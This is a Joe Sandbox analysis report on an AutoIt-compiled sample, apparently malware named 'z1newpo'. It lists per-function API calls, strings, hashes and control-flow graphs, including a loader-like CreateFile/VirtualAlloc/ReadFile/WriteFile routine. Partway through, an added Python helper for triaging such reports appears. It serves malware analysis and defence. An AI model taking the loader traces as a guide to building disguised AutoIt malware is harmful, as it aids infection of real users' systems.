                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                    • String ID: 0SH
                                                    • API String ID: 3363477735-851180471
                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: IsThemeActive$uxtheme.dll
                                                    • API String ID: 2574300362-3542929980
                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                    • API String ID: 1762048999-758534266
                                                    • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                    • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                    Similarity
                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                    • API String ID: 3948761352-1609664196
                                                    • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                    • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
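The function blocks on this page list, per function of the 0x00400000 image, the Windows and CRT APIs it calls and the String IDs it references. The command-line switches (/AutoIt3ExecuteLine, /AutoIt3ExecuteScript, /AutoIt3OutputDebug, /ErrorStdOut), the "AutoIt v3 GUI" window class and the Software\AutoIt v3\AutoIt registry key are strings of the AutoIt3 interpreter stub, so these functions belong to the AutoIt runtime that wraps the payload rather than to the payload itself; /AutoIt3ExecuteScript in particular makes the compiled stub run a script file named on its command line. The Python below is an added triage helper, not part of the Joe Sandbox report or its IDA plugin: it parses bullet lines in the report's shape into per-function records, then flags AutoIt runtime markers and LoadLibrary/GetProcAddress pairs (dynamic import resolution such as uxtheme.dll!IsThemeActive). The two-function sample text and the marker list are constructed for this example.

```python
"""Added triage helper for Joe Sandbox per-function 'APIs' / 'String ID' lines.

Parses the report's bullet lines into per-function records and flags AutoIt
runtime markers and LoadLibrary/GetProcAddress pairs. The sample text is
constructed in the report's shape; the marker list is this example's own choice.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: two function blocks in the shape of the report above.
SAMPLE_REPORT = """\
APIs
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
• __wcsicoll.LIBCMT ref: 00402007
Similarity
• API ID: __wcsicoll$FileModuleName
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Similarity
• String ID: IsThemeActive$uxtheme.dll
"""

# One API bullet: optional "Part of subcall function XXXX:" prefix, Name.MODULE,
# optional "(args)", then "ref: ADDR". Handles both "(...), ref:" and "ref:" forms.
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_ID_RE = re.compile(r"^\s*•\s+String ID:\s*(?P<ids>.*)$")

# Strings carried by the AutoIt3 interpreter stub (list chosen for this example).
AUTOIT_MARKERS = frozenset({
    "/AutoIt3ExecuteLine", "/AutoIt3ExecuteScript", "/AutoIt3OutputDebug",
    "AutoIt v3", "AutoIt v3 GUI", "Software\\AutoIt v3\\AutoIt",
})


def parse_blocks(text: str) -> List[Dict]:
    """Split report text at each 'APIs' header; collect API calls and String IDs."""
    blocks: List[Dict] = []
    cur: Optional[Dict] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "strings": []}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            cur["apis"].append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"),
                "subcall": m.group("sub"),  # None when the function calls it directly
            })
            continue
        m = STRING_ID_RE.match(line)
        if m and m.group("ids").strip():
            # The report joins String IDs with '$'.
            cur["strings"] = m.group("ids").strip().split("$")
    return blocks


def triage(blocks: List[Dict]) -> List[Dict]:
    """Per block: AutoIt markers, LoadLibrary/GetProcAddress pairs, direct API names."""
    out: List[Dict] = []
    for idx, b in enumerate(blocks):
        markers = sorted(s for s in b["strings"] if s in AUTOIT_MARKERS)
        dyn: List[Tuple[Optional[str], str]] = []
        last_lib: Optional[str] = None
        for call in b["apis"]:
            if call["api"].startswith("LoadLibrary") and call["args"]:
                last_lib = call["args"][0]                # module name is the first argument
            elif call["api"] == "GetProcAddress" and len(call["args"]) >= 2:
                dyn.append((last_lib, call["args"][1]))   # export name is the second argument
        out.append({
            "block": idx,
            "autoit_markers": markers,
            "dynamic_imports": dyn,
            "direct_apis": sorted({c["api"] for c in b["apis"] if c["subcall"] is None}),
        })
    return out


if __name__ == "__main__":
    for rec in triage(parse_blocks(SAMPLE_REPORT)):
        print(rec)
```

Running the helper over a full report lets an analyst skip the AutoIt runtime functions (every block that carries a marker) and concentrate on blocks with no markers and unusual direct APIs, which is where the unpacked payload's own behaviour shows up.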
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • _wcscat.LIBCMT ref: 00427541
                                                    • _wcslen.LIBCMT ref: 00427551
                                                    • _wcslen.LIBCMT ref: 00427562
                                                    • _wcscat.LIBCMT ref: 0042757C
                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                    Similarity
                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                    • String ID: Include$\
                                                    • API String ID: 3173733714-3429789819
                                                    • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                    • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                    APIs
                                                    • _fseek.LIBCMT ref: 0045292B
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                    • _fseek.LIBCMT ref: 004529BF
                                                    • _malloc.LIBCMT ref: 004529CA
                                                    • _malloc.LIBCMT ref: 004529D6
                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                    • _free.LIBCMT ref: 00452A17
                                                    • _free.LIBCMT ref: 00452A20
                                                    Similarity
                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                    • String ID:
                                                    • API String ID: 1255752989-0
                                                    • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                    • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                    APIs
                                                    Similarity
                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                    • String ID: FILE
                                                    • API String ID: 3888824918-3121273764
                                                    • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                    • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                    • ImageList_ReplaceIcon.COMCTL32(00950AB8,000000FF,00000000), ref: 00410552
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00950AB8,000000FF,00000000), ref: 00410552
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _malloc
                                                    • String ID: Default
                                                    • API String ID: 1579825452-753088835
                                                    • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                    • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1971 40f640 1970->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1979 40f65b-40f65e 1975->1979 1980 425d1e-425d3e call 4150d1 call 414d04 1975->1980 1977 40f68e-40f68f 1976->1977 1978 40f69f-40f6ad 1976->1978 1977->1975 1981 40f6b4-40f6c2 1978->1981 1982 40f6af-40f6b2 1978->1982 1979->1969 1979->1971 1990 425d43-425d5f call 414d30 1980->1990 1984 425d16 1981->1984 1985 40f6c8-40f6d6 1981->1985 1982->1975 1984->1980 1988 425d05-425d0b 1985->1988 1989 40f6dc-40f6df 1985->1989 1988->1973 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1984
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                    • String ID: AU3!$EA06
                                                    • API String ID: 1268643489-2658333250
                                                    • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                    • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2001 401184-40118e call 401250 1997->2001 2002 40114c-40114f 1997->2002 1998->1997 2000 401120-401126 1998->2000 2003 40112c-401141 DefWindowProcW 1999->2003 2000->2003 2005 42b038-42b03f 2000->2005 2008 401193-40119a 2001->2008 2006 401151-401157 2002->2006 2007 40119d 2002->2007 2005->2003 2013 42b045-42b059 call 401000 call 40e0c0 2005->2013 2011 401219-40121f 2006->2011 2012 40115d 2006->2012 2009 4011a3-4011a9 2007->2009 2010 42afb4-42afc5 call 40f190 2007->2010 2009->2000 2014 4011af 2009->2014 2010->2008 2011->2000 2017 401225-42b06d call 468b0e 2011->2017 2015 401163-401166 2012->2015 2016 42b01d-42b024 2012->2016 2013->2003 2014->2000 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2014->2021 2023 42afe9-42b018 call 40f190 call 401a50 2015->2023 2024 40116c-401172 2015->2024 2016->2003 2022 42b02a-42b033 call 4370f4 2016->2022 2017->2008 2021->2008 2032 401204-401216 CreatePopupMenu 2021->2032 2022->2003 2023->2003 2024->2000 2034 401174-42afde call 45fd57 2024->2034 2034->2003 2045 42afe4 2034->2045 2045->2008
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                    • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                    APIs
                                                    • _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                    • String ID: ,*H$4*H$@fI
                                                    • API String ID: 615853336-1459471987
                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2065 426a970-426a9c2 call 426a870 CreateFileW 2068 426a9c4-426a9c6 2065->2068 2069 426a9cb-426a9d8 2065->2069 2070 426ab24-426ab28 2068->2070 2072 426a9da-426a9e6 2069->2072 2073 426a9eb-426aa02 VirtualAlloc 2069->2073 2072->2070 2074 426aa04-426aa06 2073->2074 2075 426aa0b-426aa31 CreateFileW 2073->2075 2074->2070 2077 426aa55-426aa6f ReadFile 2075->2077 2078 426aa33-426aa50 2075->2078 2079 426aa93-426aa97 2077->2079 2080 426aa71-426aa8e 2077->2080 2078->2070 2081 426aab8-426aacf WriteFile 2079->2081 2082 426aa99-426aab6 2079->2082 2080->2070 2084 426aad1-426aaf8 2081->2084 2085 426aafa-426ab1f CloseHandle VirtualFree 2081->2085 2082->2070 2084->2070 2085->2070
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0426A9B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                    • Instruction ID: 4710044c76ccde9fc9efc4b6d55fdea9b9f3ca995a2c47bc8f96ab34a8a29537
                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
